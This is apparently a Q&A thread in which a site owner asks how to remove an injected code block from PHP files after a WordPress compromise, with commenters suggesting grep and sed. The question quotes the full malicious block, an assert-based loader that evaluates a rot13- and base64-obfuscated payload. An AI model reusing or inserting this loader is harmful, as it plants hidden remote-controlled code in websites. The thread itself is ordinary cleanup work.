# PHP read each .php file and search for code, not string

Tags: php

Long story short, my server was infected through an old wordpress install.  I found the leak and now I have to clean up all of the affected files.  All files that were affected were given a block of code, which is the same across all affected files.

I'm trying to loop through my server directory, search for this block of code then delete it and save the file.

There are a couple of problems that might make this hard.

1. The stuff I'm looking for is PHP code and I'm not sure the way I'm doing this will look for a specific string in a code block, rather it will only look for strings
2. My host has changed the permissions on any of these files to `200`, so I need to change these to `604` or `777` (temporarily) to be able to open, change and save the files.

This is what I have so far:

```
function getDirContents($dir, $mal) {
    $files = scandir($dir);
    foreach($files as $file) {
        if($file == "." || $file == "..") continue;
        if(!is_file($dir . $file)){
            //echo "Folder: " . $dir . $file . "<br />";
            getDirContents($dir.$file."/", $mal);
        } else {
            //echo "File: " . $dir . $file . "<br />";
            $content = file_get_contents($dir . $file);
            if (strpos($content, $mal) !== false) {
                echo "FOUND" . $dir.$file . "<br>";
            }
        }
    }
}

$dir = "./";
$mal = "//###=CACHE START=###";
getDirContents($dir, $mal);
```

So, I am searching for this specific comment: `//###=CACHE START=###`.  This is the same in every affected file, but I can not seem to search for it.

I haven't gotten to the deleting of the code block yet, but I am trying to remove this from each file:

```
//###=CACHE START=###
error_reporting(0);
assert_options(ASSERT_ACTIVE, 1);
assert_options(ASSERT_WARNING, 0);
assert_options(ASSERT_QUIET_EVAL, 1); $strings = "as";$strings .= "sert";     $strings(str_rot13('riny(onfr64_qrpbqr("nJLtXTymp2I0XPEcLaLcXFO7VTIwnT8tWTyvqwftsFOyoUAyVUftMKWlo3WspzIjo3W0nJ5aXQNcBjccozysp2I0XPWxnKAjoTS5K2Ilpz9lplVfVPVjVvx7PzyzVPtunKAmMKDbWTyvqvxcVUfXnJLbVJIgpUE5XPEsD09CF0ySJlWwoTyyoaEsL2uyL2fvKFxcVTEcMFtxK0ACG0gWEIfvL2kcMJ50K2AbMJAeVy0cBjccMvujpzIaK21uqTAbXPpuKSZuqFpfVTMcoTIsM2I0K2AioaEyoaEmXPEsH0IFIxIFJlWGD1WWHSEsExyZEH5OGHHvKFxcXFNxLlN9VPW1VwftMJkmMFNxLlN9VPW3VwfXWTDtCFNxK1ASHyMSHyfvH0IFIxIFK05OGHHvKF4xK1ASHyMSHyfvHxIEIHIGIS9IHxxvKGfXWUHtCFNxK1ASHyMSHyfvFSEHHS9IH0IFK0SUEH5HVy07PvEcpPN9VPEsH0IFIxIFJlWFEH1CIRIsDHERHvWqBjbxqKWfVQ0tVzu0qUN6Yl8kAwDhZGZlYwD0YwR4BP9aMKDhpTujC2yjCFVhqKWfMJ5wo2EyXPEcpPxhVvMxCFVhqKWfMJ5wo2EyXPExXF4vWaH9Vv51pzkyozAiMTHbWUHcYvVzLm0vYvEwYvVznG0kWzt9Vv5gMQHbVwt2LGV2ZmWxZGp0MGIvAJV2ZJVjAGpmZJV5LwOyZGOzVv4xMP4xqF4xLl4vZFVcBjccMvucozysM2I0XPWuoTkiq191pzksMz9jMJ4vXFN9CFNkXFO7PvEcLaLtCFOznJkyK2qyqS9wo250MJ50pltxqKWfXGfXsFOyoUAynJLbMaIhL3Eco25sMKucp3EmXPWwqKWfK2yhnKDvXFxtrjbxL2ttCFOwqKWfK2yhnKDbWUIloPx7PzA1pzksp2I0o3O0XPEwnPjtD1IFGR9DIS9VEHSREIVfVRMOGSASXGfXL3IloS9mMKEipUDbWTAbYPOQIIWZG1OHK1WSISIFGyEFDH5GExIFYPOHHyISXGfXWUWyp3IfqPN9VTA1pzksMKuyLltxL2tcBjcwqKWfK2Afo3AyXPEwnPx7PvEcLaLtCFNxpzImqJk0Bjc9VTIfp2HtrjbxMaNtCFOzp29wn29jMJ4bVwR2AP4kZmVhAQDhZGt4VvjtBQNfVPEypaWholjtWTIlpaA0pvjtZmNcBjccMvNbWTMjXFO7PvNtVPNxo3I0VQ0tVxqSIPNiM2I0YaObpQ9cpQ0vYaIloTIhL29xMFtxnKNcYvVzMQ0vYaIloTIhL29xMFtxMPxhVvM1CFVhqKWfMJ5wo2EyXPE1XF4vWzZ9Vv4xLl4vWzx9ZFMbCFVhoJD1XPV4AzRlAwZlMQR3ATH1LwIvAwSvZQH3ZmSvBJVjMGRjMvVhWTDhWUHhWTZhVwRvXF4vVRuHISNiZF4kKUWpovV7PvNtVPNxo3I0VP49VPWVo3A0BvNkAwDhZGZlYwD0YwR4BSklKT4vBjbtVPNtWT91qPNhCFNvD29hozIwqTyiowbtD2kip2IppykhKUWpovV7PvNtVPOzq3WcqTHbWTMjYPNxo3I0XGfXVPNtVPElMKAjVQ0tVvV7PvNtVPO3nTyfMFNbVJMyo2LbWTMjXFxtrjbtVPNtVPNtVPElMKAjVP49VTMaMKEmXPEzpPjtZGV4XGfXVPNtVU0XVPNtVTMwoT9mMFtxMaNcBjbtVPNtoTymqPtxnTIuMTIlYPNxLz9xrFxtCFOjpzIaK3AjoTy0XPViKSWpHv8vYPNxpzImpPjtZvx7PvNtVPNxnJW2VQ0tWTWiMUx7Pa0XsDc9BjccMvucp3AyqPtxK1WSHIISH1EoVaNvKFxtWvLtWS9FEISIEIAHJlWjVy0tCG0tVzSuZmR3MzWzVvxtrlOyqzSfXUA0pzyjp2kup2uypltxK1WSHIISH1EoVzZvKFxcBlO9PzIwnT8tWTyvqwg9"));'));
//###=CACHE END=###
```

Any advice?

Comment: You have command line access? grepping seems like it'd be easier.

Comment: I do, but I don't know how to do that.  I'll look into it

Comment: `grep '//###=CACHE START=###' --include="*.php" -r .` when navigated to the code base I think would do it.. or you might need to `sudo` that

Comment: Great! Thank you, let me try to do this right now

Comment: use `find`+`sed` in a bash script, e.g.  http://stackoverflow.com/a/10557577/1163786

Comment: @chris85, That works to show me the files, that's a great start - now I need to figure out how to change permissions (getting permission denied).

Comment: I'd update the tags, I don't think I'd do this with PHP. I'd remove the malicious code with `sed` or `awk` and `sudo` then change all the permissions back as they were.

Comment: Why can't you just restore your code from your version control system?

Comment: @Barmar, I started as a terrible developer, teaching myself.  All of these affected files are old, nothing on here is version controlled.  I've learned recently and am versioning my files.  My hosting company has old versions and I could probably go patch most of this stuff, but I don't know when or what I would need to update.